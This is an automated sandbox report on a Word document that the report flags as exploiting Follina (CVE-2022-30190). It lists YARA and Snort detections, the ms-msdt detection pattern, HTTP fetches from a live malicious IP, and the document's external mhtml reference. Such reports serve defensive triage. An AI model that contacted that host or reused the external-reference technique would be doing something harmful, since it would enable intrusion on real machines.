Edit tour

Windows Analysis Report
doc1712.docx

Overview

General Information

Sample Name:	doc1712.docx
Analysis ID:	640804
MD5:	7a91b01a037ccbfe6589161643d0a65a
SHA1:	53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256:	f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
Infos:

Detection

Follina CVE-2022-30190

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Snort IDS alert for network traffic

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1204 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x3ca7:$re1: location.href = "ms-msdt:
dump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
Click to see the 1 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) - Source IP: 45.32.185.177 - Destination IP: 192.168.2.22

Timestamp:	45.32.185.177192.168.2.2280491762036726 06/07/22-17:33:41.296228
SID:	2036726
Source Port:	80
Destination Port:	49176
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: doc1712.docx

Virustotal: Detection: 23%

Perma Link

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 45.32.185.177:80

Source: global traffic

TCP traffic: 192.168.2.22:49176 -> 45.32.185.177:80

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 45.32.185.177:80 -> 192.168.2.22:49176

Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 45.32.185.177

Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	String found in binary or memory: http://45.32.185
Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	String found in binary or memory: http://45.32.185.177/123.RES
Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	String found in binary or memory: http://45.32.185.177/123.RESyX
Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	String found in binary or memory: http://45.32.185.177:80/123.RES

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FB641AE-A3C8-41BE-B49C-07E97C275C10}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive

Source: dump.pcap, type: PCAP	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784

Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: doc1712.docx

Virustotal: Detection: 23%

Source: doc1712.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\doc1712.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$oc1712.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR625A.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOCX@1/18@0/1

Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:http://45.32.185.177:80/123.res!http://45.32.185.177:80/123.res

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
doc1712.docx	23%	Virustotal		Browse
doc1712.docx	11%	Metadefender		Browse

Source	Detection	Scanner	Label
http://45.32.185	0%	Avira URL Cloud	safe
http://45.32.185.177/123.RESyX	0%	Avira URL Cloud	safe
http://45.32.185.177/123.RES	0%	Avira URL Cloud	safe
http://45.32.185.177:80/123.RES	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://45.32.185.177/123.RES	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.32.185	~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	true	Avira URL Cloud: safe	low
http://45.32.185.177/123.RESyX	~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://45.32.185.177:80/123.RES	~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.32.185.177	unknown	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	640804
Start date and time: 07/06/202217:32:33	2022-06-07 17:32:33 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	doc1712.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.expl.evad.winDOCX@1/18@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
TCP Packets have been reduced to 100
Report size getting too big, too many NtQueryAttributesFile calls found.

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2866751271712012
Encrypted:	false
SSDEEP:	48:I39dFlkRBwRiSdXfthv4qx3qF5QJNGs0lNo21rSTrwjGmH:K7fkLwMShf/3oF5MGsGo25srwjGmH
MD5:	205378DA7DCF371A43C479B7B0F9A2AD
SHA1:	E00F4D3429165C950A6FCA02AC85B4EE4BE79F86
SHA-256:	A04716B070A827159831E3AD865F6A62B2466F941722B54ED2862A1FD7883A3C
SHA-512:	695EEEA6F4FA6449AD2BD822499C0698729641C9489CA2F3901DCE51F8A2516F3C1198BF958740D8B3A6D6AB0A61ABBC6E5D0E857DFD06C723DFEECEF2ED1BCC
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z;'wu_.B........S,...X.F...Fa.q............................#.b.%r.I.....)...............9.B..}.....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{21C75FA3-D59D-4916-8777-2F8DF89A7989}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6722944138308831
Encrypted:	false
SSDEEP:	96:KTCyPQuvtjXLi5CpoGCd1GKGXVMZCBIEMLW/LtWLt:APxv5i5C+Ga1NbsLo8tit
MD5:	0619296DF6C45C7BE46A7252C333B2C2
SHA1:	A43D8FF16A461B32B6A7F10B8B5A63F609C35427
SHA-256:	016831A58683C476F54FAEA19E0308406037953FB098236DD861105721775B29
SHA-512:	D30A9B621C9BADEC6B59F7A9A731DC9C946FE500D8AD0CA2DA13E8EB509E790C8FFE4121F17A5700CB3C3DE871F4244CC6E174B0063D73E42F827A16465D9853
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.h..s@2N..t...S,...X.F...Fa.q.............................T..:i.N....t.9..........C....J...m..j..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.8757507299451563
Encrypted:	false
SSDEEP:	3:yVlgsRlzsmlwr7Kl4WRGKSWWP3ZnNc+YUnUYDZ276:yPblzHMGSfpO+YUBt22
MD5:	C14E09D3EC890E7ED1042FB5E67173E4
SHA1:	192CBAE659A8861394BE1583C410C1AF900C503C
SHA-256:	FA11FB46BC064933EBF6F226409F02F62AB09EAF92099BF4C6C08AA33921F326
SHA-512:	C67243C05CAE05FA67259DA5E41457B49CB363AD5BE650D4186B9405FE05FDE83EDF35819EA3A6A8C2A0700459D6031C839475CCF0514A8794AE5D642AB1F9B2
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.2.1.C.7.5.F.A.3.-.D.5.9.D.-.4.9.1.6.-.8.7.7.7.-.2.F.8.D.F.8.9.A.7.9.8.9.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2880583450358858
Encrypted:	false
SSDEEP:	48:I3IoHRRBTZBA6TdqEz6uVpWiK7IxgeZGett8fhrUMzfKqDcDfH:K1LTZTPOs3ZGett8FUMGhH
MD5:	9E46BE96F855416E452AF830BDB02202
SHA1:	14E4A4E600D7C8910070ECA1F06DD5C4356CA7C7
SHA-256:	3E0056641E7814076CC40F431D5BAF1A69ACCCD583F4898A4E08173E08F9CD7C
